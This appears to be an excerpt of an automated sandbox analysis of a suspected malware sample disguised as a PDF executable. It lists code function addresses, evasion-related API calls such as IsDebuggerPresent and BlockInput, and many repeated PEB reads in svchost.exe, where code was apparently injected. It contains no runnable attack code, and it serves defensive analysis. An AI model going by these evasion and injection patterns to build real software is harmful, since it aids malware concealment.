Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00417993 LdrLoadDll, 9_2_00417993
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0045A370 BlockInput, 6_2_0045A370
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 6_2_0040D590
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0040EBD0 LoadLibraryA,GetProcAddress, 6_2_0040EBD0
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_04002558 mov eax, dword ptr fs:[00000030h] 6_2_04002558
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_040025B8 mov eax, dword ptr fs:[00000030h] 6_2_040025B8
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_04004700 mov eax, dword ptr fs:[00000030h] 6_2_04004700
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_04005D60 mov eax, dword ptr fs:[00000030h] 6_2_04005D60
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_04005DC0 mov eax, dword ptr fs:[00000030h] 6_2_04005DC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D437C mov eax, dword ptr fs:[00000030h] 9_2_036D437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B035C mov eax, dword ptr fs:[00000030h] 9_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B035C mov eax, dword ptr fs:[00000030h] 9_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B035C mov eax, dword ptr fs:[00000030h] 9_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B035C mov ecx, dword ptr fs:[00000030h] 9_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B035C mov eax, dword ptr fs:[00000030h] 9_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B035C mov eax, dword ptr fs:[00000030h] 9_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036FA352 mov eax, dword ptr fs:[00000030h] 9_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D8350 mov ecx, dword ptr fs:[00000030h] 9_2_036D8350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0370634F mov eax, dword ptr fs:[00000030h] 9_2_0370634F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03708324 mov eax, dword ptr fs:[00000030h] 9_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03708324 mov ecx, dword ptr fs:[00000030h] 9_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03708324 mov eax, dword ptr fs:[00000030h] 9_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03708324 mov eax, dword ptr fs:[00000030h] 9_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366A30B mov eax, dword ptr fs:[00000030h] 9_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366A30B mov eax, dword ptr fs:[00000030h] 9_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366A30B mov eax, dword ptr fs:[00000030h] 9_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362C310 mov ecx, dword ptr fs:[00000030h] 9_2_0362C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03650310 mov ecx, dword ptr fs:[00000030h] 9_2_03650310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h] 9_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h] 9_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h] 9_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h] 9_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h] 9_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h] 9_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h] 9_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036403E9 mov eax, dword ptr fs:[00000030h] 9_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 9_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 9_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 9_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036663FF mov eax, dword ptr fs:[00000030h] 9_2_036663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036EC3CD mov eax, dword ptr fs:[00000030h] 9_2_036EC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 9_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 9_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 9_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 9_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 9_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 9_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036383C0 mov eax, dword ptr fs:[00000030h] 9_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036383C0 mov eax, dword ptr fs:[00000030h] 9_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036383C0 mov eax, dword ptr fs:[00000030h] 9_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036383C0 mov eax, dword ptr fs:[00000030h] 9_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B63C0 mov eax, dword ptr fs:[00000030h] 9_2_036B63C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE3DB mov eax, dword ptr fs:[00000030h] 9_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE3DB mov eax, dword ptr fs:[00000030h] 9_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE3DB mov ecx, dword ptr fs:[00000030h] 9_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE3DB mov eax, dword ptr fs:[00000030h] 9_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D43D4 mov eax, dword ptr fs:[00000030h] 9_2_036D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D43D4 mov eax, dword ptr fs:[00000030h] 9_2_036D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362E388 mov eax, dword ptr fs:[00000030h] 9_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362E388 mov eax, dword ptr fs:[00000030h] 9_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362E388 mov eax, dword ptr fs:[00000030h] 9_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365438F mov eax, dword ptr fs:[00000030h] 9_2_0365438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365438F mov eax, dword ptr fs:[00000030h] 9_2_0365438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03628397 mov eax, dword ptr fs:[00000030h] 9_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03628397 mov eax, dword ptr fs:[00000030h] 9_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03628397 mov eax, dword ptr fs:[00000030h] 9_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03634260 mov eax, dword ptr fs:[00000030h] 9_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03634260 mov eax, dword ptr fs:[00000030h] 9_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03634260 mov eax, dword ptr fs:[00000030h] 9_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362826B mov eax, dword ptr fs:[00000030h] 9_2_0362826B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 mov eax, dword ptr fs:[00000030h] 9_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B8243 mov eax, dword ptr fs:[00000030h] 9_2_036B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B8243 mov ecx, dword ptr fs:[00000030h] 9_2_036B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0370625D mov eax, dword ptr fs:[00000030h] 9_2_0370625D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362A250 mov eax, dword ptr fs:[00000030h] 9_2_0362A250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03636259 mov eax, dword ptr fs:[00000030h] 9_2_03636259
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036EA250 mov eax, dword ptr fs:[00000030h] 9_2_036EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036EA250 mov eax, dword ptr fs:[00000030h] 9_2_036EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362823B mov eax, dword ptr fs:[00000030h] 9_2_0362823B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036402E1 mov eax, dword ptr fs:[00000030h] 9_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036402E1 mov eax, dword ptr fs:[00000030h] 9_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036402E1 mov eax, dword ptr fs:[00000030h] 9_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 9_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 9_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 9_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 9_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 9_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_037062D6 mov eax, dword ptr fs:[00000030h] 9_2_037062D6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036402A0 mov eax, dword ptr fs:[00000030h] 9_2_036402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036402A0 mov eax, dword ptr fs:[00000030h] 9_2_036402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h] 9_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C62A0 mov ecx, dword ptr fs:[00000030h] 9_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h] 9_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h] 9_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h] 9_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h] 9_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366E284 mov eax, dword ptr fs:[00000030h] 9_2_0366E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366E284 mov eax, dword ptr fs:[00000030h] 9_2_0366E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B0283 mov eax, dword ptr fs:[00000030h] 9_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B0283 mov eax, dword ptr fs:[00000030h] 9_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B0283 mov eax, dword ptr fs:[00000030h] 9_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03704164 mov eax, dword ptr fs:[00000030h] 9_2_03704164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03704164 mov eax, dword ptr fs:[00000030h] 9_2_03704164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h] 9_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h] 9_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C4144 mov ecx, dword ptr fs:[00000030h] 9_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h] 9_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h] 9_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362C156 mov eax, dword ptr fs:[00000030h] 9_2_0362C156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C8158 mov eax, dword ptr fs:[00000030h] 9_2_036C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03636154 mov eax, dword ptr fs:[00000030h] 9_2_03636154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03636154 mov eax, dword ptr fs:[00000030h] 9_2_03636154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03660124 mov eax, dword ptr fs:[00000030h] 9_2_03660124
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov eax, dword ptr fs:[00000030h] 9_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov ecx, dword ptr fs:[00000030h] 9_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov eax, dword ptr fs:[00000030h] 9_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov eax, dword ptr fs:[00000030h] 9_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov ecx, dword ptr fs:[00000030h] 9_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov eax, dword ptr fs:[00000030h] 9_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov eax, dword ptr fs:[00000030h] 9_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov ecx, dword ptr fs:[00000030h] 9_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov eax, dword ptr fs:[00000030h] 9_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DE10E mov ecx, dword ptr fs:[00000030h] 9_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DA118 mov ecx, dword ptr fs:[00000030h] 9_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DA118 mov eax, dword ptr fs:[00000030h] 9_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DA118 mov eax, dword ptr fs:[00000030h] 9_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DA118 mov eax, dword ptr fs:[00000030h] 9_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F0115 mov eax, dword ptr fs:[00000030h] 9_2_036F0115
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_037061E5 mov eax, dword ptr fs:[00000030h] 9_2_037061E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036601F8 mov eax, dword ptr fs:[00000030h] 9_2_036601F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F61C3 mov eax, dword ptr fs:[00000030h] 9_2_036F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F61C3 mov eax, dword ptr fs:[00000030h] 9_2_036F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 9_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 9_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AE1D0 mov ecx, dword ptr fs:[00000030h] 9_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 9_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 9_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03670185 mov eax, dword ptr fs:[00000030h] 9_2_03670185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036EC188 mov eax, dword ptr fs:[00000030h] 9_2_036EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036EC188 mov eax, dword ptr fs:[00000030h] 9_2_036EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D4180 mov eax, dword ptr fs:[00000030h] 9_2_036D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D4180 mov eax, dword ptr fs:[00000030h] 9_2_036D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B019F mov eax, dword ptr fs:[00000030h] 9_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B019F mov eax, dword ptr fs:[00000030h] 9_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B019F mov eax, dword ptr fs:[00000030h] 9_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B019F mov eax, dword ptr fs:[00000030h] 9_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362A197 mov eax, dword ptr fs:[00000030h] 9_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362A197 mov eax, dword ptr fs:[00000030h] 9_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362A197 mov eax, dword ptr fs:[00000030h] 9_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365C073 mov eax, dword ptr fs:[00000030h] 9_2_0365C073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03632050 mov eax, dword ptr fs:[00000030h] 9_2_03632050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B6050 mov eax, dword ptr fs:[00000030h] 9_2_036B6050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362A020 mov eax, dword ptr fs:[00000030h] 9_2_0362A020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362C020 mov eax, dword ptr fs:[00000030h] 9_2_0362C020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C6030 mov eax, dword ptr fs:[00000030h] 9_2_036C6030
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B4000 mov ecx, dword ptr fs:[00000030h] 9_2_036B4000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h] 9_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h] 9_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h] 9_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h] 9_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h] 9_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h] 9_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h] 9_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D2000 mov eax, dword ptr fs:[00000030h] 9_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h] 9_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h] 9_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h] 9_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h] 9_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362A0E3 mov ecx, dword ptr fs:[00000030h] 9_2_0362A0E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036380E9 mov eax, dword ptr fs:[00000030h] 9_2_036380E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B60E0 mov eax, dword ptr fs:[00000030h] 9_2_036B60E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362C0F0 mov eax, dword ptr fs:[00000030h] 9_2_0362C0F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036720F0 mov ecx, dword ptr fs:[00000030h] 9_2_036720F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B20DE mov eax, dword ptr fs:[00000030h] 9_2_036B20DE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036280A0 mov eax, dword ptr fs:[00000030h] 9_2_036280A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C80A8 mov eax, dword ptr fs:[00000030h] 9_2_036C80A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F60B8 mov eax, dword ptr fs:[00000030h] 9_2_036F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F60B8 mov ecx, dword ptr fs:[00000030h] 9_2_036F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363208A mov eax, dword ptr fs:[00000030h] 9_2_0363208A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03638770 mov eax, dword ptr fs:[00000030h] 9_2_03638770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640770 mov eax, dword ptr fs:[00000030h] 9_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640770 mov eax, dword ptr fs:[00000030h] 9_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640770 mov eax, dword ptr fs:[00000030h] 9_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640770 mov eax, dword ptr fs:[00000030h] 9_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640770 mov eax, dword ptr fs:[00000030h] 9_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640770 mov eax, dword ptr fs:[00000030h] 9_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640770 mov eax, dword ptr fs:[00000030h] 9_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640770 mov eax, dword ptr fs:[00000030h] 9_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640770 mov eax, dword ptr fs:[00000030h] 9_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640770 mov eax, dword ptr fs:[00000030h] 9_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640770 mov eax, dword ptr fs:[00000030h] 9_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640770 mov eax, dword ptr fs:[00000030h] 9_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366674D mov esi, dword ptr fs:[00000030h] 9_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366674D mov eax, dword ptr fs:[00000030h] 9_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366674D mov eax, dword ptr fs:[00000030h] 9_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03630750 mov eax, dword ptr fs:[00000030h] 9_2_03630750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036BE75D mov eax, dword ptr fs:[00000030h] 9_2_036BE75D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672750 mov eax, dword ptr fs:[00000030h] 9_2_03672750
